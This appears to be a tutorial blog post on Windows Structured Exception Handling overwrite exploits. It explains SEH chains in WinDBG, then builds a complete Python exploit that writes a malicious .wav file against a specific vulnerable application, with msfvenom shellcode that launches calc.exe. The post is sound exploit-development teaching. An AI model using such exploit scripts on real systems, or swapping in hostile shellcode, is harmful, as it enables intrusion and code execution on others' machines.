Structured Exception Handling Exploits

SEH

SEH (Structured Exception Handling) is the mechanism Windows uses for exceptions.

They are implemented as a linked list, and each node contains a pointer to an exception handler.

The last node is the default handler, which crashes the application.

Thread Environment Block

The TEB is a data structure containing information about the current thread, and that includes the current SEH frame. The FS register will point to the TEB. We can access the SEH frame at FS:[0].

Make sure you have WinDBG and MSVC installed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

#include <cstdio>
#include <Windows.h>
int main() {
    __try {
        printf("Triggering exception.\n");
        volatile int *pInt = 0x00000000;
        *pInt = 0;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        printf("Handling exception.\n");
    }
}

$ cl main.cpp

Compile the code and open the executable in WinDBG. You can use !exhain to view the SEH chain, and use d FS:[0] to view the TEB.

We dump the first record in the chain and the last. Notice how each part a record contains the following:

4 bytes which point to the next handler (nSEH).

4 bytes that point to the current handler.

I have color coded the image to make it easier to see.

Using the current one as an example:

00d9f910 (10f9d900 in little endian) which is nSEH. 00061cb0 (b01c0600 in little endian) is the pointer to the handler.

Do notice how the last nSEH is FFFFFFFF. If it is reached, the application will crash.

Exploitation

We can overwrite the SEH record to obtain code execution.

We will use this vulnerability as an example: https://www.exploit-db.com/exploits/49089

The link contains a download link for the application, as well as an exploit.

The vulnerability is located on the code that parses a .wav file.

What we want to do is overwrite nSEH with a JMP instruction, and SEH with POP POP RET. The handler will be called, it will pop 8 bytes of the stack, the return will jump to where our nSEH is (which has been replaced by a JMP) is located and start executing the JMP, landing on a NOP sled and eventually our shellcode.

Now, open the application in x64dbg. The binary has anti debugging functionalities, so make sure you’re using the ScyllaHide plugin. I used msf-pattern_create to check how many bytes I needed to overwrite nSEH. We need 4132 bytes.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

nSEH = b"\x42" * 4
SEH = b"\x43" * 4

buffer = b"\x41" * 4132
buffer += nSEH
buffer += SEH


with open("exploit.wav", "wb") as f:
    f.write(buffer)

Run the script to generate the wav file and open the program under x64dbg.

Go to Batch Convert Mode and add the wav we created. When the application crashes switch to the SEH tab on the debugger.

Great! It seems we have the correct offset.

For the next steps make sure you install the ERC plugin.

Now we want to overwrite nSEH with a JMP instruction.

We can use ERC for this.

ERC --assemble JMP 10
JMP 10 = EB 08

1

nSEH = struct.pack("<I", 0x08EB9090)

Next we will need to search the binary for a POP POP RET sequence of instructions.

Type this in the x64dbg command input:

ERC –-SEH

I went with 0x0040652f.

SEH = struct.pack("<I", 0x0040652f)

Now all that’s left is to add our shellcode. I will use msfvenom to generate it:

msfvenom -p windows/exec CMD=calc.exe -v shellcode -f python

Now our exploit should look like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

import struct

nSEH = struct.pack("<I", 0x08EB9090)
SEH = struct.pack("<I", 0x0040652f)
NOP = b"\x90" * 20

shellcode =  b""
shellcode += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"
shellcode += b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
shellcode += b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"
shellcode += b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"
shellcode += b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"
shellcode += b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"
shellcode += b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"
shellcode += b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
shellcode += b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"
shellcode += b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
shellcode += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
shellcode += b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
shellcode += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb"
shellcode += b"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
shellcode += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47"
shellcode += b"\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c"
shellcode += b"\x63\x2e\x65\x78\x65\x00"

buffer = b"\x41" * 4132
buffer += nSEH
buffer += SEH
buffer += NOP
buffer += shellcode
with open("exploit.wav", "wb") as f:
    f.write(buffer)

Run it and try to add the file to the application. A calculator will pop up.